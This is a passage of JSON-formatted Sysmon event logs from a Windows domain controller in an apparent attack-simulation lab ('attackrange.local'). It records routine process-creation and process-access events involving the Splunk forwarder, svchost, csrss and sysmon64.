Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.622\r\nProcessGuid: {A837DB8D-0239-5F25-0000-001083250500}\r\nProcessId: 4200\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nParentProcessId: 2528\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.622","ProcessGuid":"{A837DB8D-0239-5F25-0000-001083250500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-0010E51F0500}","ParentProcessId":"2528","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nSourceProcessId: 2528\r\nSourceThreadId: 2772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001083250500}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010E51F0500}","SourceProcessId":"2528","SourceThreadId":"2772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001083250500}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001083250500}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001083250500}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3193,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3194,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3195,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3196,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 